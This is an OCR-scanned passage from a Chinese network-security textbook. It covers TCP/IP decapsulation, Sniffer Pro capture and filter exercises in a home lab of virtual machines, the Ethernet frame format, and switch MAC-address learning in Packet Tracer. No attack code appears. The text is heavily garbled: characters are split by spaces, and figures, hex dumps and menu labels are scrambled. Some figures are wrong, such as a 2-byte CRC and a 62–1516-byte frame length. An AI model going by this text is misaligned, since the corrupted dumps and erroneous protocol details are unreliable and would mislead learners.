图 1-15 采用 因特网 模型 的 数据 交换 过 程 


再 看 接收 方 的 处 理 过 程 ,接收 方 的 物理 层 将 从 介质 上 传递 过 来 的 模拟 信号 还 原 为 计 
算 机 能 够 识别 的 二 进 制 数字 信号 ,然后 将 其 向 上 传递 给 数据 链 路 层 处 理 。 数 据 链 路 层 首 
先 利用 数据 尾部 的 T2 对 报 文 进行 完整 性 校 验 ,通过 校 验 之 后 从 H2 中 取出 目的 MAC 地 
址 与 自己 的 MAC 地 址 比较 ,如 不 相同 (说 明 这 个 数据 包 不 是 发 送 给 自己 的 ), 则 丢弃 这 个 
报 文 ,如 相同 , 则 去 掉 数 据 的 头 部 H2 和 尾部 T2, 将 剩余 数据 向 上 提交 给 网 络 层 的 IP 协 
议 。IP 协议 收 到 数据 之 后 ,从 H3 中 取出 目的 IP 地 址 与 自己 的 IP 地 址 进行 比较 ,如 不 相 
同 (说 明 这 个 数据 包 不 是 发 送 给 自己 的 ), 则 丢弃 这 个 报 文 ,如 相同 , 则 去 掉头 部 H3, 将 剩 
余数 据 向 上 提交 给 传输 层 的 TCP。TCP 收 到 数据 之 后 ,从 头 部 H4 中 取出 目的 端口 ,发 
现 值 为 25, 于 是 将 去 掉头 部 H4 之 后 的 剩余 数据 提交 给 应 用 层 的 SMTP。 最 后 SMTP 从 
收 到 的 数据 中 提取 出 发 信和 收 信和 邮箱 地 址 .邮件 的 主题 .正文 等 相关 信息 ,邮件 传送 至 此 
结束 。 

通过 上 面 的 分 析 , 可 以 看 到 发 送 方 发 送 数据 对 应 的 是 一 个 数据 的 封装 过 程 ,接收 方 接 
收 数据 对 应 的 是 一 个 数据 的 拆 装 过 程 。MAC 地 址 和 IP 地 址 实现 了 主机 到 主机 的 通信 、 
端口 号 实现 了 进程 到 进程 的 通信 。 


1 协议 分 析 仪 Sniffer Pro 的 使 用 


协议 分 析 仪 Sniffer Pro 可 以 捕获 经 过 本 机 指定 网 卡 的 所 有 数据 包 , 停 止 数据 捕捉 之 后 可 
以 对 数据 按照 TCP/IP 格式 进行 详细 分 析 。 下 面 结合 示例 介绍 Sniffer Pro 的 使 用 方法 。 

训练 : 在 本 机 运行 Sniffer Pro 捕捉 本 机 浏览 虚拟 机 网 页 index. html 过 程 中 产生 的 
网 络 数据 包 ,并 分 析 网 络 数据 包 的 层次 结构 ,要 求 指出 数据 包 的 数据 链 路 层 、 网 络 层 、 传 输 
层 、 应 用 层 。 

第 一 步 : 选择 待 监听 的 网 卡 。 

Sniffer Pro 只 能 工作 在 某 块 选 定 网 卡 上 ,因此 首先 要 指定 这 块 工 作 网 卡 。 方 法 是 ， 
单 击 “ 文 件 ” 一 “设置 ”, 选择 某 块 网 卡 。 图 1-16 为 选 定 本 机 与 虚拟 机 通信 时 使 用 的 
VMware 虚拟 网 卡 。 如 果 在 网 卡 列表 中 没有 需要 的 网 卡 可 以 单 击 “ 新 建 ”选项 ,在 网 络 列 
表 框 中 选择 所 需 网 卡 。 


选 定 网 卡 


图 1-16 选 定 网 卡 


第 二 步 : 开始 捕获 。 
单 击 工具 栏 上 的 “开始 捕捉 ”按钮 ,此 时 “停止 ”按钮 变 为 红色 , 当 Sniffer Pro 捕获 到 
第 一 个 报 文 之 后 ,停止 并 查看 按钮 变 为 可 用 状态 。Sniffer Pro 已 经 捕获 的 数据 包 个 数 显示 


开始 捕捉 停止 停止 并 查看 


Sniffer Portable - Local 1, Ethernet (Line speed at 100 Wbps) 所 器 民 


r Capture Display Tools Database Window Help 


了 il 
芒 | 晶 | 全 | 加 | 当 |o| 到 [WI@lR| 之 | @| ®| ln 


已 经 捕捉 到 16 个 数据 包 


图 1-17 开始 捕获 


ED 网 络 安全 基础 ”sg 


在 右 下 脚 的 位 置 。 

第 三 步 : 在 本 机 浏览 虚拟 机 的 index. html。 

在 本 机 浏览 虚拟 机 的 index. html, 目 的 是 产生 网 络 通信 数据 ,虚拟 机 会 将 index. html 
文件 的 内 容 hello 通过 一 个 IP 数据 报 传递 到 本 机 。 

第 四 步 : 停止 并 查看 捕获 结果 。 

单 击 “停止 并 查看 ”按钮 结束 捕捉 , 单 击 decode 可 以 查看 到 如 图 1-18 所 示 的 结果 。 


Sniffer Portable - Local 1, Ethernet (Line speed at 100 Ebps) - [Snif3: Decode, 3/12 Ethernet Fraaes] [CE] 区 
时 Eile Nonitor Capture Displey Tools Datsbase Windor Help 


共 司 一 全 生生 全 要 浊 加 全 | S| ®] ,1l sl) 一 全 一 
Er 


No, 和 > TSeuce 


[192.168.2.10] |IC 
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图 1-18 ” Sniffer Pro 的 三 个 区 域 


显示 结果 分 为 三 个 区 域 : 第 一 个 区 域 显 示 的 是 捕捉 到 的 每 个 报 文 的 摘要 信息 ,每 行 
记录 对 应 了 一 个 报 文 的 摘要 ,通过 摘要 可 以 了 解 到 报 文 的 大 致 信息 。 当 用 鼠标 单 击 选中 
某 个 报 文 之 后 ,后面 两 部 分 区 域 自动 切换 为 选中 报 文 的 相关 内 容 。 以 第 三 条 记录 为 例 ， 
No 字段 表明 编号 为 3、Source Address 字段 表明 报 文 的 发 送 方 IP 地 址 为 192. 168. 2. 10， 
Dest Address 字段 表明 报 文 的 接收 方 IP 为 192. 168. 2. 3,Summary 字段 表明 这 是 一 
ICMP 请 求 报 文 ,通过 摘要 信息 可 知 这 是 本 机 发 给 虚拟 机 的 一 个 ICMP 请 求 报 文 。 

通过 第 二 个 区 域 可 以 了 解 到 报 文 更 详细 的 信息 。 这 个 区 域 按照 TCP/IP 的 格式 和 层 
次 结构 , 即 数据 链 路 层 、 网 络 层 、 传 输 层 、 应 用 层 的 顺序 解释 了 报 文 每 个 字 节 的 含义 , 见 
图 1-19。 

第 三 个 区 域 是 以 十 六 进 制 形 式 显 示 了 报 文 的 内 容 , 这 一 区 域 由 从 左 至 右 的 三 块 组 成 ， 
中 间 这 一 块 是 以 十 六 进 制 形式 显示 报 文 的 内 容 , 每 行 显示 16 个 字 节 。 左 边 那 块 是 以 十 六 
进 制 形式 显示 每 行 第 一 个 字 节 的 编号 。 右 边 那 块 是 按照 ASCII 格式 对 报 文 进行 解析 ,由 
于 存在 无 法 解析 的 字 节 ,因此 在 这 一 区 域 可 能 会 出 现 乱 码 。 

第 五 步 : 搜索 包含 “hello” 字 符 串 的 数据 包 。 

Sniffer Pro 可 能 会 捕获 大 量 的 数据 包 , 例 如 上 万 个 报 文 ,如 何在 众多 数据 包 中 快速 找 
到 需要 的 报 文 呢 ? Sniffer Pro 提供 了 一 个 数据 搜索 功能 ,利用 这 个 功能 就 可 以 快速 定位 
到 某 个 报 文 。 因 为 index. html 文件 的 内 容 “hello” 一 定 会 通过 某 个 IP 数据 报 传递 给 本 
机 ,利用 搜索 功能 将 这 个 报 文 找到 。 右 击 第 一 个 数据 包 , 选 择 “ 查 找 帧 ”", 在 弹出 的 “搜索 ” 
对 话 框 的 “查找 ”文本 框 中 输入 “hello”, 选 择 查 找 类 型 为 Data ASCII, 查 找 方向 为 Down， 
单 击 “ 确 定 ” 按 钮 。 查 找 界面 如 图 1-20 所 示 。 
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Frame 3 arrived at 11:05:53.5483; frame size is 74 (004A hex) bytes 
Destination = Station COCOCOCOCOCO 


Source tation ViWareC00001 一 一 一 数据 链 路 层 14 字 节 含 义 


Ethertype = 


- IP Header 一 一 


IF: Version = 4. header length = 20 bytes 
IP: Type of service = 00 
IP 000 = routine 


BIF 0 = normal delay 
BIF 0 = normal throughput 
BIF 0 Ormal reliability 
IP 0 CT bit - transport protocol will ignore the CE bit 


E bit - no congestion 
0 bytes 

1374 

X 

ay fragnent 


LY IF: Total length 
IF: Identification 


IP: Flags 
IP 0 
IP 0 


WIP: Fragnent offset 
IP, Tine to live 


IP; Protocol 
IP: Header cher 
IP: Source add 


last fragnent 一 一 一 网 络 层 20 字 节 含 义 
bytes 

28 seconds/hops 

(ICMP) 


IP: Destination address 
IP: No options 


IP 

日 多 ICHP: 一 -一 ICMP header -一 一 
ICMP 
ICMP: Type = 8 (Echo) 


ICMP: Ca 0 
Checksun = 4ASC 
Identifier = 51 
Sequence nunber = 256 
[32 bytes of data] 


(correct) 


一 一 一 传输 层 40 字 节 含义 


[Normal end of “ICMP header".] 


图 1-19 详细 解释 每 个 字 节 的 含义 


Find Frame 


Text |Tine | Data |Status| Expert| 


Search 三 Sammary tex (? Data ASCI 
(Detail te CF Data Hex 
[IS Match case 


Search Ch om 


图 1-20 查找 界面 


查找 结果 如 图 1-21 所 示 ,可 见 第 18 个 报 文 是 虚拟 机 发 送 给 本 机 的 携带 了 ”hello" 字 
符 串 的 IP 数据 报 。 

第 六 步 : 划分 “hello” 报 文 的 层次 结构 。 

“hello” 报 文 的 层次 结构 如 图 1-22 所 示 。 前 14 字 节 为 数据 链 路 层 数据 ,之 后 20 字 节 
为 网 络 层 数据 ,再 后 面 20 字 节 为 传输 层 数据 ,其 后 的 全 部 数据 为 应 用 层 数据 。 

训练 : 按 如 图 1-23 所 示 配 置 网 络 环境 ,在 本 机 启动 Sniffer, 配 置 过 滤器 只 捕获 IP 地 


机 


ource Addhess 
1192.168-2-10] 
[192.168.2.3] 
|[192.168.2-10] 


33 163 339] 


昌 电 DIC Ethertype-0800, size-283 bytes 

mIP; De[192.168.2.10] S*[192.168.2.3] LEN*249 ID*2839 
TCP; D=1133 S*80 ACK=177273083 SEQ*1553063919 LEN=229 VIN*64003 
HTTP. R Port1133 HTTP/1.1 Status*OK-5 bytes of conten 


图 1-21 查找 结果 


网 络 属 20 字 节 传输 层 20 字 节 


数据 链 路 层 14 字 节 
00000000: 00 50 56|c0 00 01 c0lc0 c0 c0 c0 c0 08 00 
00000010: 01 0d 一 一 一 00 80 06 -一 76 一 -一 一 一 


00000020: 02 0a 0 6d 
00000030 : £2 0 0 0 00 
00000040 : 

00000050 : 
00000060 : 
00000070: 
00000080: 
00000090 : 
000000a0 : 
000000b0: 
000000c0: 
000000d0 : 
000000e0 : 
000000f0: 
00000100 : 
00000110 : 


45 00 .PVY?. 览 览 览 . . 
括 


E. 
oad .. 括 


图 1-22 层次 结构 的 划分 


192.168.2.3 192.168.2.4 
C0-C0-C0-C0-C0-C0 全 C33? BO-BO-BO0-BO0-BO-BO 


Windows XP 虚拟 机 ”host-only Windows 2000 虚 拟 机 
图 1-23 实验 环境 


址 为 192.168.2.4、MAC 地 址 为 B0-B0-B0-B0-B0-Bo0 的 数据 包 。 
第 一 步 : 以 host-only 方式 启动 Windows 2000 和 Windows XP 虚拟 机 ,按照 图 1-23 
配置 地 址 信息 。 
第 二 步 : 设 定 过 滤器 只 捕获 包含 Windows 2000 虚拟 机 IP 地 址 的 数据 包 。 
在 Sniffer Pro 中 单 击 “ 捕 获 ” 菜 单 ,选择 “定义 过 滤器 ” ,选择 “ 地 址 ”选项 卡 ,在 “地 址 ” 
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列表 中 选择 IP ,在 规则 列表 中 输入 Windows 2000 虚拟 机 的 IP 地 址 , 单 击 “ 确 定 ” 按 钮 。 
设置 界面 如 图 1-24 所 示 。 


Define Filter - Capture 


Sunmary Mdress |Data Pattern | Mivanced | Buffer | 


Address Known Address: (Dragable) 


时 ,ny 


由- 盎 Broadcast/lnlticast Address 


按 IP 地 址 过 滤 


取消 Profiles... 
图 1-24 设置 按 IP 地址 过 滤 


第 三 步 : 测试 IP 地 址 过 滤器 。 

在 本 机 启动 Sniffer, 然 后 分 别 执行 ping 192. 168. 2. 4 和 ping 192. 168. 2. 3, 停 止 
Sniffer, 查 看 捕获 数据 。 捕 获 报 文 的 数据 截图 如 图 1-25 所 示 , 可 见 每 个 报 文 都 包含 192. 
168. 2.4 地 址 。 


[1 ] 
[192.168.2.4] 


[192.168.2.10] 
[192.168.2.4] 
92 168 0 


图 1-25 捕获 报 文 的 数据 截图 


第 四 步 : 取消 过 滤器 。 

在 进行 MAC 地 址 过 滤器 设置 实验 之 前 需要 将 IP 过 滤器 取消 , 单 击 “ 捕 获 ” 菜 单一 选 
择 “ 定 义 过 滤器 ”一 在 弹出 的 对 话 框 中 单 击 Reset 按钮 , 见 图 1-26。 

第 五 步 : 设 定 过 滤器 只 捕获 包含 Windows 2000 虚拟 机 MAC 地 址 的 数据 包 。 

在 Sniffer Pro 中 单 击 “捕获 ?菜单 ,选择 “定义 过 滤器 ,选择 * 地 址 ?选项 卡 ,在 “地 址 ” 
列表 中 选择 Hardware, 在 规则 列表 中 输入 Windows 2000 虚拟 机 的 MAC 地 址 , 单 击 “ 确 
定 ” 按 钮 。 设 置 界面 如 图 1-27 所 示 。 

第 六 步 : 测试 MAC 地 址 过 滤器 。 

在 本 机 启动 Sniffer, 然 后 分 别 执行 ping 192. 168. 2. 4 和 ping 192. 168. 2. 3 ,停止 
Sniffer, 查 看 捕获 数据 ,可 见 每 个 报 文 都 包含 B0-B0-B0-B0-B0-B0 地 址 。 

训练 : 设 定 过 滤器 ,只 捕获 使 用 HTTP 的 数据 包 。 

第 一 步 : 配置 协议 过 滤器 。 

在 Sniffer Pro 中 单 击 “ 捕 获 ” 菜 单 ,选择 “定义 过 滤器 ” ,选择 “高 级 ”选项 卡 , 在 树 型 结 
构 中 依次 展开 IP 和 TCP, 选 中 HTTP, 单 击 “ 确 定 ” 按 钮 , 见 图 1-28。 

要 


Define Filter 一 Capture 


Samary | Aadress | Data Pattern | Advanced | Buffer | 


Type: IP 
Node: Include 


192. 168.2.4 <-—> Any 
日 -Buffer 


Buffer size: 8 leg Byte 
Buffer action: Wrap 


取消 | Profiles... 
图 1-26 取消 IP 过 滤器 


Define Filter - Capture 


Sunmary Mdress |Data Pattern | Advanced | Buffer | 


Settings For, 

Address Known Address: Dragsble) Delank 

Har dware 了 画 Ay 

Mode 一 一 一 外遇 Broadcast/lalticast Address 

由 如 Host Table 

me 汪 Address Book 

C Exclude 
Windows 2000 
虚拟 机 的 MAC 


| 
加 
[确定 | 取消 | Profiles... 
图 1-27 


按 MAC 地 址 过 滤 
Define Filter — Capture 


Sunmary | Address | Data Pattern Advanced | Buffer | 


选中 HTTP 


Packet Size 


-Packet Type 
re [BNormal 
[BICRC Error 
四 Jabber 


All sizes 


取消 Profiles. . 


图 1-28 按 协 议 类 型 过 滤 
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第 二 步 : 测试 过 滤器 。 
在 本 机 启动 Sniffer, 然 后 执行 ping 192. 168. 2. 3 和 浏览 192. 168. 2. 3 主页 ,停止 
Sniffer, 查 看 捕获 数据 ,如 图 1-29 所 示 , 所 有 数据 包 都 包含 80 端口 。 


Decod 4 日 
No [Status |Source Actess Dest Adiress E 
1 
日 : [152.168.2.3] [192.168.2.10] CP D=116 20019 LEN=0 WIN=64 
日 3 [192 168 2 10] [192 168 2 3] 
[192.168.2.10] [192.168.2.3] 
5 [192.168.2.3] [192.169.2.10] 
日 [192.168.2.10] [192.168.2.3] 
7 [192.168.2.3] [192.168.2.10] 0 bytes cf cont| 
日 [182 168 2 3] [192.168.2.10] 
9 192.168.2.10] E392:189-2-30 
10 192.168.2.3] 192.168.2.10] 
11 192.168.2.10] [192.168.2.3] 
12 132 168 2 3] [192.168.2.10] 04 LEN=0 WIN=6d| 
13 [192.168.2.10] [192.168.2.3] 
14 [152 168 2 10] |[192 168 -2 3] 


出 | 晶 一 一 一 


TE 


Epo h Decode K Mev A Host opie A Protoca Dr SEE 


山 加 


图 1-29 按 协议 过 滤 


1. 什么 是 对 等 进程 ? 

2. 因特网 模型 中 信息 是 如 何在 各 层 之 间 传 递 的 ? 

3. 因特网 模型 中 为 什么 设置 传输 层 ? 

4， 虚 拟 机 的 三 种 联网 方式 , 即 hostronly\NAT、 桥 接 方式 有 何 区 别 ? 
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第 2 音 
数据 链 路 层 及 其 安全 问题 


2.1 ”以 太 网 数据 链 路 层 帧 格式 


以 太 网 是 当今 局 域 网 采用 的 最 通用 的 通信 协议 标准 ,以 太 网 数据 帧 结构 如 图 2-1 所 
示 。 以 太 网 数据 帧 的 长 度 变化 范围 在 62 一 1516 字 节 。6 个 字 节 的 目的 MAC 地 址 表示 接 
收 方 主机 的 MAC 地 址 ,6 个 字 节 的 源 MAC 地 址 表示 发 送 方 主机 的 MAC。 广 播 地 址 用 
0xFF-FF-FF-FF-FF-FF 表示 。 类 型 字段 代表 网 络 层 使 用 协议 的 类 型 ,例如 ,0x0806 代表 
ARP .0x0800 代表 IP 协议 。 数 据 字段 的 长 度 范 围 在 46 一 1500 区 间 ,2 字 节 的 CRC 校 验 
和 用 于 差错 处 理 。 下 面 结合 实例 分 析 以 太 网 数据 链 路 层 帧 格式 。 


6 字 节 6 字 节 2 字 节 46~1500 字 节 ”2 字 节 


目的 MAC 地 址 | 源 MAC 地 址 | 协议 | ”数据 [crc 


图 2-1 以 太 网 数据 帧 结构 


训练 : 使 用 Sniffer 捕获 一 组 数据 包 , 从 中 任意 选择 一 个 数据 包 ,分析 其 前 14 个 字 节 
的 含义 。 
一 步 : 以 host-only 方式 启动 Windows XP 虚拟 机 ,配置 IP 地 址 ,使 用 ping 命令 测 
试 与 本 机 的 通信 和 情况。 本 机 和 Windows XP 虚拟 机 的 地 址 信息 如 图 2-2、 图 2-3 所 示 。 


Physical hddress 
Dhcp Enabled 


IP hddress 


图 2-2 本 机 的 地 址 信息 


Physical hddress 


Dhcp Enabled 
IP Address 


图 2-3 Windows XP 虚拟 机 的 地 址 信息 


第 二 步 : 在 本 机 启动 Sniffer( 注 意 选 定 虚 拟 网 卡 ) ,执行 ping 虚拟 机 IP, 停 目 Sniffer， 
从 捕获 数据 中 任 选 一 个 IP 数据 包 分 析 前 14 个 字 节 的 格式 。 从 图 2-4 可 知 ,这 个 报 文 的 
目的 MAC 地 址 是 本 机 的 MAC 地 址 , 源 MAC 为 Windows XP 虚拟 机 的 MAC 地 址 ,网 
络 层 使 用 的 是 IP 协议 。 说 明 这 是 Windows XP 虚拟 机 发 给 本 机 的 一 个 IP 数据 包 。 

如 图 2-5 所 示 ,数据 包 的 目的 MAC 地 址 为 广播 地 址 , 源 MAC 地 址 为 本 机 MAC ,网 
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目的 MAC- 本 抽 的 MAC 源 MAC: 虚拟 机 的 MAC ”协议 类 型 : IP 
00000000: 00 50 56|c0 00 01 c0 c0 c0|c0 c0 c0 08|00 45 00 .PV? . 览 览 览 . .下 
00000010: 00 3c 00 85 00 00 80 01 b4 de c0 a8 02 03 c0 a8 ..?5 .省 括 ,. 括 
00000020: 02 0a 00 00 4e 5c 02 00 05 00 61 62 63 64 65 66 ....NN\.,..abcdef 
00000030: 67 68 69 6a 6b bc bd be 6f 70 71 72 73 74 75 76 ghijklmopqrstuv 
00000040: ?77 61 62 63 64 65 66 67 68 69 wabcdef ghi 


图 2-4 JIP 数 据 包 链 路 层 数据 格式 


络 层 协议 类 型 为 ARP, 可 见 这 是 本 机 发 送 的 一 个 ARP 广播 数据 包 , 网 络 中 所 有 主机 都 会 
接收 到 这 个 报 文 。 


目的 MAC: 广 播 地 址 源 MAC: 木 机 的 MAC ”网 络 层 协 议 :ARP 


00000: ££ ff ff|ff ff ff 00 50 56|c0 00 01 08|06 00 01 ,PY?... 
00010: 08 00 06 04 00 01 00 $0 86 co 00 01 cd a8 02 0a ...... .PV?. 括 .. 
00020: 00 00 00 00 00 00 c0 a8 02 03 00 00 00 00 00 00 ... 括 .... 

00030: 00 00 00 00 00 00 00 00 00 00 0000 。 


图 2-5 ARP 数据 包 链 路 层 数据 格式 


2 交换 机 的 地 址 学 习 机 制 


221 交换 机 的 地 址 学 习 过 程 


交换 机 是 工作 在 数据 链 路 层 的 网 络 设备 , 它 根据 数据 包 的 目的 MAC 地址 到 自身 存 
储 的 MAC 地 址 表 中 进行 匹配 查找 ,根据 查找 结果 在 特定 端口 转发 数据 包 , 因 此 交换 机 是 
一 种 单 播 设备 。 下 面 举例 说 明 交 换 机 的 工作 机 制 。 

如 图 2-6 所 示 ,三 台 主 机 依次 连接 到 交换 机 的 1.2、3 端口 ,图 中 给 出 了 每 台 主机 的 IP 
和 MAC 地 址 。 在 交换 机 的 内 存 中 存储 了 一 个 MAC 地 址 转换 表 , 其 中 记录 了 三 条 MAC 
地 址 和 交换 机 端口 的 映射 记录 。 以 第 一 条 记录 为 例 , 它 表示 MAC 地 址 为 A0-A0-A0-A0- 
A0-Ao0 的 主机 连接 在 交换 机 的 1 号 端口 。 假 设 这 时 主机 1 发 给 主机 3 一 个 IP 数据 包 , 交 
换 机 收 到 这 个 报 文 之 后 ,取出 目的 MAC 地 址 到 MAC 地 址 转换 表 中 进行 查找 ,发 现 和 第 
三 条 记录 匹配 ,于 是 在 3 号 端口 转发 这 个 数据 包 。 这 样 一 来 ,只 有 主机 3 可 以 收 到 这 个 报 
文 ,网 络 中 其 他 主机 无 法 收 到 这 个 数据 包 。 

通过 上 面 的 分 析 可 知 ,MAC 地 址 转换 表 是 交换 机 的 工作 基础 。 这 个 转换 表 有 两 种 
生成 方式 。 第 一 种 是 静态 配置 , 即 由 网 络 管理 员 手 工 输入 MAC 地 址 和 端口 的 映射 记录 ， 
这 种 方法 比较 复杂 , 当 有 新 计算 机 加 入 网 络 或 某 台 主 机 网 卡 MAC 地 址 发 生变 化 时 都 需 
要 手工 更 新 MAC 地 址 转换 表 , 因 此 这 种 方法 很 少 采 用 。 第 二 种 是 利用 交换 机 的 地 址 学 
习 机 制 自动 生成 MAC 地 址 转换 表 , 这 种 方法 无 须 任何 配置 ,可 以 适应 网 络 的 动态 变化 ， 
是 默认 的 交换 机 地 址 表 生 成 方式 。 下 面 举 例 说 明 交 换 机 的 地 址 学 习 机 制 。 

主机 1 的 MAC 地 址 学 习 过 程 如 图 2-7 所 示 。 交 换 机 刚 开 始 工 作 时 ,其 MAC 地 址 转 
换 表 中 没有 任何 记录 。 这 时 主机 1 给 主机 3 发 送 一 个 IP 数据 包 ,交换 机 将 源 MAC 地 址 
( 即 主机 1 的 MAC) 和 接收 到 这 个 数据 包 的 端口 1 添加 到 MAC 地 址 表 中 。 由 于 当前 地 
址 表 中 没有 主机 3 的 转换 记录 ,因此 交换 机 在 除 1 号 端口 之 外 的 所 有 端口 转发 这 个 数据 
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主机 3 MAC 地 址 转换 表 
C0-C0-C0-C0-C0-C0 (3 A0-A0-A0-A0-A0-A0 <-> 1 


B0-B0-B0-BO-B0-B0 <-> 2 
C0-C0-C0-C0-C0-C0 <-> 3 
192.168.0.1 全 [ 192.168.0.2 
A0-A0-A0-A0-A0-A0 (7 G37 B0-B0-B0-B0-B0-B0 


主机 1 主机 2 


目的 MAC : 主机 3 源 MAC : 主机 1 网 络 层 协议 : IP 


G0-C0-C0-C0|A0-A0-A0-A0-A0-A0 国 G50 友 | 高层 数据 
主机 1 主机 3 
图 2-6 交换 机 的 工作 机 制 


包 , 此 时 交换 机 的 工作 性 质 类 似 于 集线器 ,网 络 中 所 有 主机 都 可 以 收 到 这 个 报 文 。 通 过 这 
个 数据 包 , 交 换 机 学 习 到 主机 1 的 MAC 地 址 对 应 1 号 端口 。 


主机 3 MAC 地 址 转换 表 
192.168.0.3 
C0-C0-C0-C0-C0-C0 3 A0-A0-A0-A0-A0-A0 <-> 1 


192.168.0.1 


面 | 192.168.0.2 
A0-A0-A0-A0-A0-AI € 


会 9 BO-B0-B0-BO-BO-B0 


目的 MAC : 了 


源 MAC : 主机 1 网 络 层 协议 : IP 


1A0-A0-A0-A0-A0-A0| 


主机 1 主机 3 
图 2-7 学 习 主机 1 的 MAC 地址 


主机 2 的 MAC 地 址 学 习 过 程 如 图 2-8 所 示 。 主 机 2 给 主机 3 发 送 一 个 IP 数据 包 ， 
交换 机 收 到 这 个 报 文 之 后 ,将 报 文 的 源 MAC 地 址 ( 即 主机 2 的 MAC) 和 端口 2 作为 一 条 
映射 记录 添加 到 MAC 地 址 表 中 。 由 于 地 址 表 中 没有 主机 3 的 MAC 地 址 信息 ,因此 交换 
机 将 这 个 报 文 在 1、3 端口 转发 。 

主机 3 的 MAC 地 址 学 习 过 程 如 图 2-9 所 示 。 主 机 3 给 主机 1 发 送 一 个 IP 数据 包 ， 
交换 机 收 到 这 个 报 文 之 后 ,将 报 文 的 源 MAC 地 址 ( 即 主机 3 的 MAC) 和 端口 3 作为 一 条 
映射 记录 添加 到 MAC 地 址 表 中 。 此 时 MAC 地 址 表 中 已 经 包含 主机 1 的 MAC 地 址 , 因 
此 交换 机 只 在 1 号 端口 转发 这 个 报 文 。 
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主机 3 MAC 地 址 转换 表 
192.168.0.3 
C0-C0-C0-C0-C0-00 持 3 AO-A0-A0-A0-A0-A0 <->1 
B0-B0-B0-B0-B0-B0 <-> 2 


192.168.0.1 [| 192.168.0.2 
A0-A0-A0-A0-A0-A0 全 £37 B0-B0-B0-B0-B0-B0 


主机 1 主机 2 


目的 MAC : 主机 3 源 MAC : 主机 2 网 络 层 协议 : IP 


cs00| 高层 数 据 


主机 3 


主机 3 MAC 地 址 转换 表 
192.168.0.3 
C0-C0-C0-C0-C0-C0 全 三光 A0-A0-A0-A0-A0-A0 <-> 1 
BO0-B0-B0-B0-B0-B0 <-> 2 
C0-C0-C0-C0-C0-C0 <-> 3 


192.168.0.1 
A0-A0-A0-A0-A0-A0 E 


面 | 192.168.0.2 
会 B0-B0-B0-B0-BO-B0 


主机 2 


源 MAC : 主机 3 网 络 层 协议 : IP 
[co-co-co-co-co-co 硬 二 | 高层 数 据 | 
主机 3 主机 1 

图 2-9 学 习 主 机 3 的 MAC 地 址 


至 此 交换 机 的 地 址 学 习 过 程 完成 。 通 过 分 析 这 个 过 程 可 以 发 现 , 当 交换 机 刚 上 电工 
作 时 , 它 的 MAC 地 址 表 还 没有 完全 形成 ,此 时 它 的 工作 性 质 类 似 集线器 ,会 在 所 有 端口 
转发 收 到 的 数据 报 。 当 MAC 地 址 学 习 过 程 完成 之 后 ,MAC 地 址 表 中 就 记录 了 所 有 主机 
的 MAC 地 址 和 端口 映射 信息 ,此 时 交换 机 只 在 特定 端口 转发 接收 到 的 数据 包 了 。 同 时 
每 一 条 MAC 地 址 映射 记录 都 对 应 了 一 个 定时 器 (例如 20s) , 当 定 时 器 时 间 到 之 后 ,这 条 
记录 会 被 删除 , 当 通信 数据 再 次 出 现时 ,交换 机 会 重新 学 习 对 应 的 MAC 地 址 。 


222 测试 交换 机 的 MAC 地 址 学 习 机 制 


训练 : 利用 Cisco 模拟 器 组 建 如 图 2-6 所 示 的 网 络 ,测试 交换 机 的 MAC 地 址 学 习 
机 制 。 


网 络 安全 基础 


第 一 步 : 利用 Cisco 模拟 器 组 建 网 络 。 

利用 Cisco 模拟 器 按照 图 2-6 组 建 网 络 , 先 添加 一 台 2950 交换 机 ,再 添加 三 台 主 机 
(名 称 依次 修改 为 PC1、PC2、PC3) ,使 用 三 条 普通 双 绞 线 连 接 主 机 与 交换 机 (PC1 连 1 端 
口 .PC2 连 2 端口 .PC3 连 3 端口 ) ,组 建 好 的 网 络 如 图 2-10 所 示 。 


Packet Tracer 5.0 by Cisco Systemas，Inc- 


el: ? 国 | 辐 ND 力 D 罗 二 1 


New Cluster Move Object Set Tiled Background Viewport 


2950-24 
Switch0 


Time: 00:03:28 | Power Cycle Devices Realtime 


本 号 国志 Ba 7 [a @ [senioo 
3 
Connections | [Cvew J[ Delete 
三 bo 零 一 a | Toggle PDU List Window 
Copper Straight-Through 固 


图 2-10 组 建 网 络 


司 |Fire LastStatus | Source 


第 二 步 : 配置 三 台 主机 的 IP 和 MAC 地 址 。 

参照 图 2-6 配置 三 台 主机 的 IP 和 MAC 地 址 。 以 PC1 为 例 进行 说 明 , 双 击 PC1, 单 
击 config, 单 击 FastEthernet, 在 MAC address 对 话 框 中 输入 “A0A0. A0A0. A0A0”, 在 
IP address 对 话 框 中 输入 “192. 168. 0. 1”, 在 Subnet mask 对 话 框 中 输入 “255. 255. 255. 0”。 

接 下 来 查看 配置 好 的 IP 和 MAC 地 址 , 单 击 desktop, 双 击 command prompt, 在 弹出 
的 DOS 窗口 输入 “ipconfig /all”, 查 看 到 如 图 2-11 所 示 结 果 。 其 他 两 台 主 机 参考 配置 。 

第 三 步 : 清空 交换 机 的 MAC 地 址 表 。 

为 了 验证 交换 机 的 地 址 学 习 机 制 先 将 交换 机 的 MAC 地 址 表 清 空 ,双击 交换 机 , 单 击 
CLI, 输 入 “en” 回 车 (进入 配置 权限 ) 一 输入 命令 “clear mac-address-table dynamic”( 清 空 
地 址 表 ) ,输入 “show mac-address-table” 查 看 地 址 表 ,结果 如 图 2-12 所 示 , 可 以 看 到 地 址 
表 已 被 清空 。 


Switch#show mac-address-table 
Mac Address Table 


PC>ipconfig /all 


Vlan MacAddress Type Ports 


图 2-11 PC1 的 地 址 信息 图 2-12 MAC 地 址 表 被 清空 
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第 四 步 : 学 习 主 机 1 和 主机 3 的 地 址 信息 ,在 PC1 的 DOS 窗口 中 执行 ping 192. 
168. 0. 3 命令 ,之 后 查看 交换 机 的 MAC 地 址 表 ,结果 如 图 2-13 所 示 。 


Switch#show mac-address-table 
Mac Address Table 


Vlan MacAddress Type Ports 


1 a0a0.a0a0.a0a0 DYNAMIC Fa0/l 一 PC1 
1 cOcO.cOcO.c0c0 DYNAMIC Fa0/3 一 PC3 


图 2-13 MAC 地 址 表 


下 面 分 析 两 条 转换 记录 的 形成 过 程 。 在 PC1 上 执行 ping 192. 168. 0. 3 命令 会 导致 
PC1 向 PC3 发 送 ICMP 数据 报 , 而 此 时 PC1 并 不 知道 PC3 的 MAC 地 址 ,因此 PC1 会 广 
播 一 个 ARP 请 求 报 文 去 询问 PC3 的 MAC , 报 文 结构 如 图 2-14 所 示 。 这 个 数据 包 的 目 
的 MAC 地 址 为 广播 地 址 , 源 MAC 地 址 为 PC1 的 MAC, 网 络 层 协 议 类 型 为 ARP, 高 层 
